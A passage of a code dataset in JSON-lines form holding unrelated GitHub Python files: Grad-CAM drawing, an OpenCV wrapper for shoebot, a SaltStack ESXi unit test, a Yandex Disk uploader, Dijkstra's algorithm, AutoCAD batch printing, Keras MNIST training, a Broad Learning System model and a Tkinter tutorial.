[1, C, H, W]\n\n # weight the channels by corresponding gradients\n for i in range(channels_number):\n activations[:, i, :, :] *= pooled_gradients[i]\n\n # average the channels of the activations\n heatmap = torch.mean(activations, dim=1).squeeze() # Shape [H, W] , mean across channel\n\n # relu on top of the heatmap\n # expression (2) in https://arxiv.org/pdf/1610.02391.pdf\n heatmap = np.maximum(heatmap.to('cpu'), 0)\n\n # normalize the heatmap\n heatmap /= torch.max(heatmap)\n \n return heatmap,class_idx\n\n\ndef grad_cam_draw(img,init_heatmap):\n image = cv2.cvtColor((img.numpy()[0]*255).transpose(1, 2, 0).astype(np.uint8), cv2.COLOR_RGB2BGR)\n heatmap = cv2.resize(init_heatmap.numpy(), (image.shape[1], image.shape[0]))\n heatmap = np.uint8(255*heatmap)\n heatmap = cv2.applyColorMap(heatmap, cv2.COLORMAP_JET)\n superimposed_img = cv2.addWeighted(image, 1., heatmap, 0.4, 0) \n fig = plt.figure()\n ax1 = fig.add_subplot(1,4,1)\n ax1.imshow(cv2.cvtColor(superimposed_img, cv2.COLOR_BGR2RGB),interpolation='bicubic')\n ax2 = fig.add_subplot(1,4,2)\n ax2.imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB),interpolation='bicubic')\n ax3 = fig.add_subplot(1,4,3)\n ax3.imshow(init_heatmap*255.0)\n ax4 = fig.add_subplot(1,4,4)\n ax4.imshow(cv2.cvtColor(heatmap, cv2.COLOR_BGR2RGB),interpolation='bicubic')\n plt.show()","repo_name":"FalconnX/ResNet18V2_Augmentation_GradCAM_LRFinder_ReduceLROnPlateau","sub_path":"gradcam_resnet18.py","file_name":"gradcam_resnet18.py","file_ext":"py","file_size_in_byte":4107,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"21276745350","text":"import cairo\nimport numpy\nimport opencv\nfrom opencv import highgui as hg\nimport os\n\n__author__ = \"Francesco Fantoni\"\n__version__ = \"0.2\"\n__copyright__ = \"Copyright (c) 2009, HVA - Hermanitos Verdes Architetti\"\n__license__ = \"lgpl\"\n\n# this imports cvBlobsLib\ntry:\n from .blobs.BlobResult import CBlobResult\n from .blobs.Blob import CBlob # Note: This must be imported in order to destroy blobs and use other methods\nexcept:\n print(\"Could not load blobs extension, some of the library features will not be available\")\n pass\n\nclass Movie:\n\n def __init__(self, path, start=0, stop=None):\n self.path = path\n self.video = hg.cvCreateFileCapture(self.path)\n\n # these functions don't seem to work at present on my linux system\n\n # self.fps = hg.cvGetCaptureProperty(self.video, hg.CV_CAP_PROP_FPS)\n # self.n_of_frames = hg.cvGetCaptureProperty(self.video, hg.CV_CAP_PROP_FRAME_COUNT)\n # self.duration = self.n_of_frames/self.fps\n # self.width = hg.cvGetCaptureProperty(self.video, hg.CV_CAP_PROP_FRAME_WIDTH)\n # self.height = hg.cvGetCaptureProperty(self.video, hg.CV_CAP_PROP_FRAME_HEIGHT)\n hg.cvSetCaptureProperty(self.video, hg.CV_CAP_PROP_POS_FRAMES, start)\n\n def frame(self, t=None, flip=False, bthreshold=128, bthreshmode=0):\n frame = MovieFrame(src=self.video, time=t, flipped=flip, thresh=bthreshold, thmode=bthreshmode)\n return frame\n\n\ndef movie(path, start=0, stop=None):\n return Movie(path, start, stop)\n\n\nclass Camera:\n\n def __init__(self, cam=0, width=None, height=None):\n self.path = cam\n self.video = hg.cvCreateCameraCapture(self.path)\n if width:\n hg.cvSetCaptureProperty(self.video, hg.CV_CAP_PROP_FRAME_WIDTH, width)\n if height:\n hg.cvSetCaptureProperty(self.video, hg.CV_CAP_PROP_FRAME_HEIGHT, height)\n\n def release_camera(camera=self.video):\n print(camera) # this for debugging, do not leave it!!!\n print(dir(camera)) # same as above\n opencv.cvReleaseCapture(camera)\n _ctx.drawing_closed = release_camera\n\n def frame(self, t=None, flip=False, bthreshold=128, bthreshmode=0):\n try:\n frame = MovieFrame(src=self.video, time=None, flipped=flip, thresh=bthreshold, thmode=bthreshmode)\n except:\n opencv.cvReleaseCapture(self.video)\n raise \"could not grab frame, closed camera capture\"\n return frame\n\n\ndef camera(cam=0, width=None, height=None):\n return Camera(cam, width, height)\n\n\nclass Image:\n\n def __init__(self, path=None):\n self.path = path\n try:\n self.iplimage = hg.cvLoadImage(self.path)\n except:\n raise AttributeError(\"could not load image file\")\n\n def _data(self):\n return ipl2cairo(self.iplimage)\n data = property(_data)\n\n def contours(self, threshold=100):\n return findcontours(self.iplimage, threshold)\n\n def haar(self, classifier):\n return detectHaar(self.iplimage, classifier)\n\n\ndef image(path=None):\n return Image(path)\n\n\nclass MovieFrame:\n\n def __init__(self, src=\"\", time=None, flipped=False, thresh=128, thmode=0):\n\n self.src = src\n self.time = time\n self.bthresh = thresh\n self.bthreshmode = thmode\n if self.time:\n hg.cvSetCaptureProperty(self.src, hg.CV_CAP_PROP_POS_FRAMES, self.time)\n self.iplimage = hg.cvQueryFrame(self.src)\n if flipped:\n opencv.cvFlip(self.iplimage, None, 1)\n self.width = self.iplimage.width\n self.height = self.iplimage.height\n\n def _data(self):\n return ipl2cairo(self.iplimage)\n data = property(_data)\n\n def _faces(self):\n self.classifier = \"haarcascade_frontalface_alt\"\n return detectHaar(self.iplimage, self.classifier)\n faces = property(_faces)\n\n def _blobs(self):\n return Blobs(self)\n blobs = property(_blobs)\n\n def contours(self, threshold=100):\n return findcontours(self.iplimage, threshold)\n\n def haar(self, classifier):\n return detectHaar(self.iplimage, classifier)\n\n\nclass Blobs:\n\n def __init__(self, frame):\n self.blob_image = opencv.cvCloneImage(frame.iplimage)\n self.blob_gray = opencv.cvCreateImage(opencv.cvGetSize(self.blob_image), 8, 1)\n self.blob_mask = opencv.cvCreateImage(opencv.cvGetSize(self.blob_image), 8, 1)\n opencv.cvSet(self.blob_mask, 1)\n opencv.cvCvtColor(self.blob_image, self.blob_gray, opencv.CV_BGR2GRAY)\n # opencv.cvEqualizeHist(self.blob_gray, self.blob_gray)\n # opencv.cvThreshold(self.blob_gray, self.blob_gray, frame.thresh, 255, opencv.CV_THRESH_BINARY)\n # opencv.cvThreshold(self.blob_gray, self.blob_gray, frame.thresh, 255, opencv.CV_THRESH_TOZERO)\n opencv.cvThreshold(self.blob_gray, self.blob_gray, frame.bthresh, 255, frame.bthreshmode)\n # opencv.cvAdaptiveThreshold(self.blob_gray, self.blob_gray, 255, opencv.CV_ADAPTIVE_THRESH_MEAN_C, opencv.CV_THRESH_BINARY_INV)\n self._frame_blobs = CBlobResult(self.blob_gray, self.blob_mask, 100, True)\n self._frame_blobs.filter_blobs(10, 10000)\n self.count = self._frame_blobs.GetNumBlobs()\n self.items = []\n for i in range(self.count):\n self.items.append(self._frame_blobs.GetBlob(i))\n\n\nclass Haarobj:\n\n def __init__(self, obj):\n self.x = obj.x\n self.y = obj.y\n self.width = obj.width\n self.height = obj.height\n\n\n# common utility functions\n\ndef ipl2cairo(iplimage):\n srcimage = opencv.cvCloneImage(iplimage)\n width = srcimage.width\n height = srcimage.height\n image = opencv.cvCreateImage(opencv.cvGetSize(srcimage), 8, 4)\n opencv.cvCvtColor(srcimage, image, opencv.CV_BGR2BGRA)\n buffer = numpy.fromstring(image.imageData, dtype=numpy.uint32).astype(numpy.uint32)\n buffer.shape = (image.width, image.height)\n opencv.cvReleaseImage(srcimage)\n opencv.cvReleaseImage(image)\n return cairo.ImageSurface.create_for_data(buffer, cairo.FORMAT_RGB24, width, height, width * 4)\n\n\ndef detectHaar(iplimage, classifier):\n srcimage = opencv.cvCloneImage(iplimage)\n grayscale = opencv.cvCreateImage(opencv.cvGetSize(srcimage), 8, 1)\n opencv.cvCvtColor(srcimage, grayscale, opencv.CV_BGR2GRAY)\n storage = opencv.cvCreateMemStorage(0)\n opencv.cvClearMemStorage(storage)\n opencv.cvEqualizeHist(grayscale, grayscale)\n try:\n cascade = opencv.cvLoadHaarClassifierCascade(os.path.join(os.path.dirname(__file__), classifier + \".xml\"), opencv.cvSize(1, 1))\n except:\n raise AttributeError(\"could not load classifier file\")\n objs = opencv.cvHaarDetectObjects(grayscale, cascade, storage, 1.2, 2, opencv.CV_HAAR_DO_CANNY_PRUNING, opencv.cvSize(50, 50))\n objects = []\n for obj in objs:\n objects.append(Haarobj(obj))\n opencv.cvReleaseImage(srcimage)\n opencv.cvReleaseImage(grayscale)\n opencv.cvReleaseMemStorage(storage)\n return objects\n\n\ndef findcontours(iplimage, threshold=100):\n srcimage = opencv.cvCloneImage(iplimage)\n # create the storage area and bw image\n grayscale = opencv.cvCreateImage(opencv.cvGetSize(srcimage), 8, 1)\n opencv.cvCvtColor(srcimage, grayscale, opencv.CV_BGR2GRAY)\n # threshold\n opencv.cvThreshold(grayscale, grayscale, threshold, 255, opencv.CV_THRESH_BINARY)\n storage = opencv.cvCreateMemStorage(0)\n opencv.cvClearMemStorage(storage)\n # find the contours\n nb_contours, contours = opencv.cvFindContours(grayscale, storage)\n # comment this out if you do not want approximation\n contours = opencv.cvApproxPoly(contours, opencv.sizeof_CvContour, storage, opencv.CV_POLY_APPROX_DP, 3, 1)\n # next line is for ctypes-opencv\n # contours = opencv.cvApproxPoly (contours, opencv.sizeof(opencv.CvContour), storage, opencv.CV_POLY_APPROX_DP, 3, 1)\n conts = []\n for cont in contours.hrange():\n points = []\n for pt in cont:\n points.append((pt.x, pt.y))\n conts.append(points)\n opencv.cvReleaseMemStorage(storage)\n opencv.cvReleaseImage(srcimage)\n opencv.cvReleaseImage(grayscale)\n return (nb_contours, conts)\n","repo_name":"shoebot/shoebot","sub_path":"lib/sbopencv/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8167,"program_lang":"python","lang":"en","doc_type":"code","stars":115,"dataset":"github-code","pt":"78"} +{"seq_id":"12855912854","text":"\"\"\"\ntests.unit.states.test_esxi\n~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nUnit tests for the esxi state module\n\"\"\"\n\nimport salt.modules.vsphere as vsphere\nimport salt.states.esxi as esxi\nfrom tests.support.case import TestCase\nfrom tests.support.mixins import LoaderModuleMockMixin\nfrom tests.support.mock import MagicMock, patch\n\n\nclass TestCertificateVerify(TestCase, LoaderModuleMockMixin):\n def setup_loader_modules(self):\n return {\n esxi: {\n \"__opts__\": {\"test\": False},\n \"__pillar__\": {\"proxy\": {\"host\": \"hostname\", \"proxytype\": \"esxi\"}},\n },\n vsphere: {},\n }\n\n def test_certificate_verify(self):\n kwargs_values = [\n (\"ssh_key\", \"TheSSHKeyFile\"),\n (\"ssh_key_file\", \"TheSSHKeyFile\"),\n ]\n certificate_verify_values = (None, True, False)\n for kw_key, kw_value in kwargs_values:\n\n def esxi_cmd_wrapper(target, *args, **kwargs):\n # The esxi salt module just wraps the call to the esxi proxy\n # module which in turn calls the target method on the vsphere\n # execution moduile.\n # That would be a TON of mocking, so we just bypass all of that\n # wrapping\n if target == \"upload_ssh_key\":\n return vsphere.upload_ssh_key(\n \"1.2.3.4\", \"root\", \"SuperSecret!\", *args, **kwargs\n )\n return {\"hostname\": {}}\n\n service_running = patch.dict(esxi.__salt__, {\"esxi.cmd\": esxi_cmd_wrapper})\n kwargs = {kw_key: kw_value}\n if kw_key == \"ssh_key\":\n expected_kwargs = {\"data\": kw_value}\n else:\n expected_kwargs = {\"data_file\": kw_value, \"data_render\": False}\n for certificate_verify_value in certificate_verify_values:\n http_query_mock = MagicMock()\n if certificate_verify_value is None:\n certificate_verify_value = True\n with patch(\"salt.utils.http.query\", http_query_mock), service_running:\n esxi.ssh_configured(\n \"blah\",\n service_running=True,\n service_restart=False,\n certificate_verify=certificate_verify_value,\n **kwargs\n )\n http_query_mock.assert_called_once_with(\n \"https://1.2.3.4:443/host/ssh_root_authorized_keys\",\n method=\"PUT\",\n password=\"SuperSecret!\",\n status=True,\n text=True,\n username=\"root\",\n verify_ssl=certificate_verify_value,\n **expected_kwargs\n )\n","repo_name":"saltstack/salt","sub_path":"tests/unit/states/test_esxi.py","file_name":"test_esxi.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","stars":13606,"dataset":"github-code","pt":"78"} +{"seq_id":"15114576804","text":"from pprint import pprint\n# import requests\n# TASK 1\n# heroes_list = ['Hulk', 'Captain America', 'Thanos']\n# for heroes_name in heroes_list:\n# response = requests.get(f'https://superheroapi.com/api/2619421814940190/search/{heroes_name}')\n# heroes_intelligence = int(response.json()['results'][0]['powerstats']['intelligence'])\n# best_intelligence = 0\n# clever_hero = ''\n# if heroes_intelligence > best_intelligence:\n# best_intelligence = heroes_intelligence\n# clever_hero = heroes_name\n# print(clever_hero, best_intelligence)\n\n# def test_request():\n# url = \"https://cloud-api.yandex.net/v1/disk/resources/files\"\n# TOKEN =\n# headers = {'Authorization': 'OAuth TOKEN, 'Content-Type': 'application/json'}\n# response = requests.get(url, headers=headers)\n# pprint(response.json())\n#\n# if __name__ == '__main__':\n# test_request()\n\n# TASK 2\nimport requests\n\nclass YaUploader:\n def __init__(self, file_path: str):\n self.file_path = file_path\n\n def upload(self):\n PREPARE_UPLOAD_URL = \"https://cloud-api.yandex.net/v1/disk/resources/upload\"\n params = {'path':'test_upload.txt', 'overwrite': 'true'}\n TOKEN = 'OAuth ****************************************'\n headers = {'Accept': 'application/json', 'Authorization': TOKEN}\n\n response = requests.get(PREPARE_UPLOAD_URL, params=params, headers=headers)\n put_url = response.json().get('href')\n\n files = {'file': open(self.file_path, 'rb')}\n response = requests.put(put_url, files=files, headers=headers)\n if response.status_code == 201: print('File successfully uploaded.')\n\nif __name__ == '__main__':\n uploader = YaUploader('test_upload.txt')\n result = uploader.upload()\n\n","repo_name":"AntonVetoshkin/requests","sub_path":"requests_test/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41235369816","text":"import sys\nimport heapq\n\ninput = sys.stdin.readline\nINF = int(1e9)\n\nn, m = map(int, input().split())\ngraph = [INF] * (n + 1)\ndistance = [[] for _ in range(n + 1)]\nfor i in range(m):\n a, b, c = map(int, input().split())\n distance[a].append((b, c))\n distance[b].append((a, c))\n\nq = []\nstart = 1\ngraph[start] = 0\nheapq.heappush(q, (graph[start], start))\n\nwhile q:\n dist, now = heapq.heappop(q)\n\n if dist > graph[now]:\n continue\n for i in distance[now]:\n cost = dist + i[1]\n if graph[i[0]] > cost:\n graph[i[0]] = cost\n heapq.heappush(q, (cost, i[0]))\n\nprint(graph[n])\n","repo_name":"ocxh/std_algorithm","sub_path":"BOJ/5972.py","file_name":"5972.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"19365621332","text":"\r\nfrom pyautocad import Autocad\r\nimport win32com.client\r\nimport win32print\r\nimport pythoncom\r\n\r\n\r\n#acad = Autocad(create_if_not_exists = True)\r\nacad = win32com.client.Dispatch(\"AutoCAD.Application.23\") #这一步差别很大 AutoCAD.Application.23为 ProgID\r\n\r\n\r\n\r\nacaddoc = acad.ActiveDocument\r\nacadmod = acaddoc.ModelSpace\r\nlayout = acaddoc.layouts.item('Model')\r\nplot = acaddoc.Plot\r\n\r\n\r\n\r\n_PRINTER = win32print.GetDefaultPrinter()\r\n_HPRINTER = win32print.OpenPrinter(_PRINTER)\r\n#_PrinterStatus = 'Warning'\r\n\r\n\r\n\r\n\r\ndef PrinterStyleSetting(): \r\n acaddoc.SetVariable('BACKGROUNDPLOT', 0) # 前台打印\r\n layout.ConfigName = 'RICOH MP C2011' # 选择打印机\r\n layout.StyleSheet = 'monochrome.ctb' # 选择打印样式\r\n layout.PlotWithLineweights = False # 不打印线宽\r\n layout.CanonicalMediaName = 'A3' # 图纸大小这里选择A3\r\n layout.PlotRotation = 1 # 横向打印\r\n layout.CenterPlot = True # 居中打印\r\n layout.PlotWithPlotStyles = True # ��照样式打印\r\n layout.PlotHidden = False # 隐藏图纸空间对象\r\n print(layout.GetPlotStyleTableNames()[-1])\r\n layout.PlotType = 4 \r\n'''\r\n PlotType (enum类型):\r\n acDisplay: 按显示的内容打印. \r\n acExtents: 按当前选定空间范围内的所有内容打印. \r\n acLimits: 打印当前空间范围内的所有内容. \r\n acView: 打印由 ViewToPlot 属性命名的视图.\r\n acWindow: 打印由 SetWindowToPlot 方法指定的窗口中的所有内容. ******\r\n acLayout: 打印位于指定纸张尺寸边缘的所有内容,原点从 0,0 坐标计算。 \r\n''' \r\n \r\n \r\n\r\n\r\nDEFAULT_START_POSITION =(3,3)\r\n\r\nDRAWING_SIZE = (598,422)\r\nDRAWING_INTEND = 700\r\n\r\n\r\n\r\nclass BackPrint(object):\r\n\r\n _instance = None\r\n def __new__(cls, *args, **kw):\r\n if cls._instance is None:\r\n cls._instance = super(BackPrint, cls).__new__(cls)\r\n return cls._instance\r\n def __init__(self,PositionX,PositionY):\r\n self.x = PositionX\r\n self.y = PositionY\r\n @staticmethod\r\n def APoint(x,y):\r\n \"\"\"坐标点转化为浮点数\"\"\"\r\n # 需要两个点的坐标\r\n return win32com.client.VARIANT(pythoncom.VT_ARRAY | pythoncom.VT_R8, (x,y))\r\n def run(self,Scale = 1.0):\r\n #self.PrinterStyleSetting()\r\n po1 = self.APoint(self.x * Scale - 1, self.y * Scale)\r\n po2 = self.APoint(self.x * Scale - 1 + DRAWING_SIZE[0], self.y * Scale + DRAWING_SIZE[1]) # 左下点和右上点\r\n layout.SetWindowToPlot(po1, po2)\r\n PrinterStyleSetting()\r\n plot.PlotToDevice() \r\n\r\n \r\n\r\nclass PrintTask:\r\n def __init__(self,maxPrintPositionArray,startPosition=(DEFAULT_START_POSITION[0],DEFAULT_START_POSITION[1])):\r\n \r\n self._PrinterStatus = 'Waiting'\r\n self.maxPrintPositionArray = maxPrintPositionArray # 此处要进行数据验证\r\n self.printBasePointArray = []\r\n self.taskPoint = startPosition\r\n self.PrintingTaskNumber = 0\r\n \r\n \r\n \r\n def runtask(self,):\r\n if not self.printBasePointArray:\r\n self.printBasePointArray = self.generalPrintBasePointArray(self.maxPrintPositionArray)\r\n \r\n for position in self.printBasePointArray:\r\n #printBasePointArray形式 : [(,),(,),]\r\n self.taskPoint = position\r\n current_task = BackPrint(*position)\r\n current_task.run()\r\n \r\n self.PrintingTaskNumber = len(win32print.EnumJobs(_HPRINTER,0,-1,1))\r\n #print('ing-> ',self.PrintingTaskNumber,'position',position)\r\n\r\n while self.PrintingTaskNumber >= 5: \r\n time.sleep(1)\r\n self.PrintingTaskNumber = len(win32print.EnumJobs(_HPRINTER,0,-1,1))\r\n time.sleep(1)\r\n \r\n \r\n def ResumeTask(self,):\r\n pass\r\n def generalPrintBasePointArray(self,maxPrintPositionArray): \r\n printBasePointArray = []\r\n next_drawing_xORy_intend = DRAWING_INTEND\r\n \r\n current_x = int((self.taskPoint[0] - 4)/ DRAWING_INTEND)*DRAWING_INTEND + DEFAULT_START_POSITION[0]\r\n current_y = int((self.taskPoint[1] - 4)/DRAWING_INTEND)*DRAWING_INTEND + DEFAULT_START_POSITION[1]\r\n \r\n \r\n #print(current_x,current_y)\r\n \r\n for position in maxPrintPositionArray:\r\n while current_x <= position + DEFAULT_START_POSITION[0]:\r\n printBasePointArray.append((current_x,current_y))\r\n current_x += next_drawing_xORy_intend\r\n current_x = DEFAULT_START_POSITION[0]\r\n current_y += next_drawing_xORy_intend \r\n return printBasePointArray #printBasePointArray形式 : [(,),(,),]\r\n \r\n def getTaskNumber(self,):\r\n TaskNumber = self.PrintingTaskNumber\r\n try:\r\n TaskNumber = len(win32print.EnumJobs(_HPRINTER,0,-1,1))\r\n return TaskNumber\r\n except Exception as e:\r\n return TaskNumber\r\n\r\n\r\nif __name__ == '__main__':\r\n #task = PrintTask([25094,10395,]) # 地下室LG层以下钢柱\r\n #task = PrintTask([27895,]) # 地下室LG层钢柱\r\n task = PrintTask([27895,],(6194,4)) # 地下室LG层钢柱\r\n task.runtask()\r\n\r\n","repo_name":"liangliang115715/cadprint","sub_path":"repository/cadprint.py","file_name":"cadprint.py","file_ext":"py","file_size_in_byte":5236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10343073568","text":"from keras.datasets import mnist\nfrom keras.utils.np_utils import to_categorical\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.optimizers import RMSprop, Adam, SGD\nfrom keras.backend import clear_session\nimport random\n\ndataset=mnist.load_data()\ntrain,test=dataset\nX_train,y_train=train\nX_test,y_test=test\n\nX_train=X_train.reshape(-1,28*28)\nX_train=X_train.astype('float32')\ny_train=to_categorical(y_train)\n\nX_test=X_test.reshape(-1,28*28)\nX_test=X_test.astype('float32')\ny_test=to_categorical(y_test)\n\naccuracy=0\n\nwhile accuracy < 80 :\n clear_session()\n counter=random.randint(1,5)\n learning_rate=random.choice([0.01,0.001,0.0001])\n epoch=random.randint(5,15)\n opt=[RMSprop,SGD,Adam]\n model = Sequential()\n for i in range(counter) :\n model.add(Dense(units=random.choice([512,128,256]),activation=\"relu\",input_shape=(784,)))\n \n counter = counter +1\n print(\"counter is \",counter)\n \n model.add(Dense(units=10,activation=\"softmax\")) \n learning_rate = random.choice([0.01,0.001,0.0001]) \n print(\"learning_rate is\", learning_rate)\n opt=random.choice(opt)\n model.compile(optimizer=(opt)(learning_rate),loss=\"categorical_crossentropy\",metrics=[\"accuracy\"])\n model.fit(X_train,y_train,batch_size=32,epochs=epoch,verbose=1)\n model.summary()\n Accuracy = model.evaluate(x=X_test,y=y_test,batch_size=32)\n print(\"Accuracy: \",(Accuracy[1]*100))\n accuracy = Accuracy[1]*100\n print(accuracy)\n ","repo_name":"saurabhagarwal43800/Integrating-ML-and-DevOps","sub_path":"mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"35263911450","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 28 03:18:22 2018\n\n\n@author: HAN_RUIZHI yb77447@umac.mo OR 501248792@qq.com\n\nThis code is the first version of BLS Python. \nIf you have any questions about the code or find any bugs\n or errors during use, please feel free to contact me.\nIf you have any questions about the original paper, \n please contact the authors of related paper.\n\"\"\"\nimport os\nimport numpy as np\nfrom sklearn import preprocessing\nfrom numpy import random\nimport time\nfrom sklearn import metrics\nfrom pickle import dump, load\n\n\nclass BroadLearningSystem:\n def __init__(self, saved_folder=\"\", model_name = \"bls_regression\", no_features=20, no_windows=5, no_enhanced_neurons=31, reg=2**-30, verbose=False,save_model=False): \n \"\"\" \n Args:\n no_features: number of the features per window. \n no_windows: number of windows in feature layer.\n no_enhanced_neurons: number of enhanced neurons.\n shrinkage: the shrinkage parameter for enhancement nodes\n reg: the regularization parameter for sparse regualarization\n save_model: whether to save a model after training, default is False\n \"\"\" \n self.model_name = model_name\n self.no_features = no_features\n self.no_windows = no_windows\n self.no_enhanced_neurons = no_enhanced_neurons\n self.reg = reg\n self.verbose = verbose \n self.save_model = save_model \n self.MODEL_PATH = f'{saved_folder}/{model_name}.pkl' \n if (not os.path.exists(saved_folder)) and self.save_model:\n os.makedirs(saved_folder)\n\n def tansig(self,x):\n \"\"\" \n activation function. \n \"\"\" \n return (2/(1+np.exp(-2*x)))-1\n\n def pinv(self,A,reg):\n return np.mat(reg*np.eye(A.shape[1])+A.T.dot(A)).I.dot(A.T)\n\n\n def shrink(self,a,b):\n z = np.maximum(a - b, 0) - np.maximum( -a - b, 0)\n return z\n\n def sparse_bls(self,A,b):\n lam = 0.001\n itrs = 50\n AA = np.dot(A.T,A) \n m = A.shape[1]\n n = b.shape[1]\n wk = np.zeros([m,n],dtype = 'double')\n ok = np.zeros([m,n],dtype = 'double')\n uk = np.zeros([m,n],dtype = 'double')\n L1 = np.mat(AA + np.eye(m)).I\n L2 = np.dot(np.dot(L1,A.T),b)\n for i in range(itrs):\n tempc = ok - uk\n ck = L2 + np.dot(L1,tempc)\n ok = self.shrink(ck + uk, lam)\n uk += ck - ok\n wk = ok\n return wk\n\n def training(self,train_x,train_y):\n u = 0\n WF = list()\n for i in range(self.no_windows):\n random.seed(i+u)\n WeightFea=2*random.randn(train_x.shape[1]+1,self.no_features)-1\n WF.append(WeightFea)\n # random.seed(100)\n self.WeightEnhan=2*random.randn(self.no_windows*self.no_features+1,self.no_enhanced_neurons)-1\n #time_start = time.time()\n H1 = np.hstack([train_x, 0.1 * np.ones([train_x.shape[0],1])])\n y = np.zeros([train_x.shape[0],self.no_windows*self.no_features])\n self.WFSparse = list()\n self.distOfMaxAndMin = np.zeros(self.no_windows)\n self.meanOfEachWindow = np.zeros(self.no_windows)\n for i in range(self.no_windows):\n WeightFea = WF[i]\n A1 = H1.dot(WeightFea) \n scaler1 = preprocessing.MinMaxScaler(feature_range=(-1, 1)).fit(A1)\n A1 = scaler1.transform(A1)\n WeightFeaSparse = self.sparse_bls(A1,H1).T\n self.WFSparse.append(WeightFeaSparse)\n \n T1 = H1.dot(WeightFeaSparse)\n self.meanOfEachWindow[i] = T1.mean()\n self.distOfMaxAndMin[i] = T1.max() - T1.min()\n T1 = (T1 - self.meanOfEachWindow[i])/self.distOfMaxAndMin[i] \n y[:,self.no_features*i:self.no_features*(i+1)] = T1\n\n H2 = np.hstack([y,0.1 * np.ones([y.shape[0],1])])\n T2 = H2.dot(self.WeightEnhan)\n\n T2 = self.tansig(T2)\n T3 = np.hstack([y,T2])\n self.WeightTop = self.pinv(T3,self.reg).dot(train_y)\n if self.save_model:\n self.save()\n\n def save(self):\n dump([self.WFSparse,self.distOfMaxAndMin,self.meanOfEachWindow,self.WeightTop,self.WeightEnhan], open(self.MODEL_PATH, 'wb'))\n\n def predict(self, test_x): \n no_samples = test_x.shape[0]\n HH1 = np.hstack([test_x, 0.1 * np.ones([no_samples,1])])\n yy1=np.zeros([no_samples,self.no_windows*self.no_features])\n for i in range(self.no_windows):\n WeightFeaSparse = self.WFSparse[i]\n TT1 = HH1.dot(WeightFeaSparse)\n TT1 = (TT1 - self.meanOfEachWindow[i])/self.distOfMaxAndMin[i] \n yy1[:,self.no_features*i:self.no_features*(i+1)] = TT1\n\n HH2 = np.hstack([yy1, 0.1 * np.ones([yy1.shape[0],1])])\n TT2 = self.tansig(HH2.dot(self.WeightEnhan))\n TT3 = np.hstack([yy1,TT2])\n prediction = TT3.dot(self.WeightTop)\n return prediction\n\n def inference(self, input_seq,pred_steps, x_y_lag=1):\n \"\"\" \n Args:\n input_seq: input x\n pred_steps: number of steps need to infer\n x_y_lag: time step gap between input x and output y\n \"\"\" \n assert len(input_seq.shape) == 2, f\"input sequence should be 2 dimensions: (samples, time steps), but {input_seq.shape}\"\n input_steps = input_seq.shape[1]\n assert x_y_lag <= input_steps, \"time step gap between input x and output y should be smaller than the number of steps of input sequence, otherwise, inference process cannot be continue.\"\n sequence = input_seq\n if os.path.exists(self.MODEL_PATH):\n self.WFSparse,self.distOfMaxAndMin,self.meanOfEachWindow,self.WeightTop,self.WeightEnhan = load(open(self.MODEL_PATH, 'rb'))\n for step in range(pred_steps):\n prediction = self.predict(sequence[:,-input_steps:])\n sequence = np.append(sequence,prediction[:,-x_y_lag:],axis = 1)\n return np.array(sequence[:,:input_steps+pred_steps])","repo_name":"Yong-Zhuang/HorizonForcing","sub_path":"model/bls.py","file_name":"bls.py","file_ext":"py","file_size_in_byte":6089,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"11363433607","text":"# Tkinter Start\n\nfrom tkinter import *\nfrom tkinter import colorchooser\n\nwindow = Tk()\n\n# geometry(\"widthxheight\")\nwindow.geometry(\"500x500\")\n\n\n# title(\"title\")\nwindow.title(\"First Software\")\n\n\n# Widget: 2 steps\n# 1. define the widget object from the respective widget class\n# 2. We need to pack the widget into the window\n\n# Label Widget\n# text_lbl = Label(window,text=\"This is my first software!\")\n# text_lbl.pack(pady=10)\n\n\n# Button Function\n# def showValue():\n# # print(\"Hello, world!\")\n# text_lbl.config(text=\"Good, Morning\")\n\n\n# Button Widget\n# btn_obj = Button(window,text=\"Click Me\", command=showValue)\n# btn_obj.pack(pady = 10)\n\n\n# text_lbl = Label(window)\n# text_lbl.pack(pady=10)\n\n\n# Entry Widget\n\n# text_lbl = Label(window,text=\"Enter your name\")\n# text_lbl.pack(pady=10)\n\n\n# entry_name = Entry(window)\n# entry_name.pack(pady=10)\n\n# def greetUser():\n# user_name = entry_name.get()\n# greet_lbl.config(text=f\"Hello, {user_name}!\")\n\n# btn_obj = Button(window,text=\"Greet Me\", command=greetUser)\n# btn_obj.pack(pady = 10)\n\n\n# greet_lbl = Label(window)\n# greet_lbl.pack(pady=10)\n\n\n\n# List Box:\n\n# lb = Listbox(window,width=50, height=20)\n\n# lb.insert(1,\"Python\")\n# lb.insert(2,\"C++\")\n# lb.insert(3,\"Java\")\n\n# lb.pack(pady=10)\n\n# lb.delete(0)\n\n\n# Color Choose\ndef changeBg():\n color = colorchooser.askcolor()\n # window.config(bg=color[1])\n btn_obj.config(bg=color[1],fg=\"white\")\n\n\nbtn_obj = Button(window, text = \"Choose a color\", command=changeBg)\nbtn_obj.pack(pady=10)\n\n\n\nwindow.mainloop()\n\n\n","repo_name":"sneha2127/python-class-projects","sub_path":"class files/class_files/class-10.py","file_name":"class-10.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"13298937032","text":"import csv\nfrom os import path\nfrom datetime import datetime\n\n# extract only queries from the query file\ndef queryonly(filename=''):\n if filename == '':\n now = datetime.now().strftime(\"%Y%m%d_%H\")\n filename = 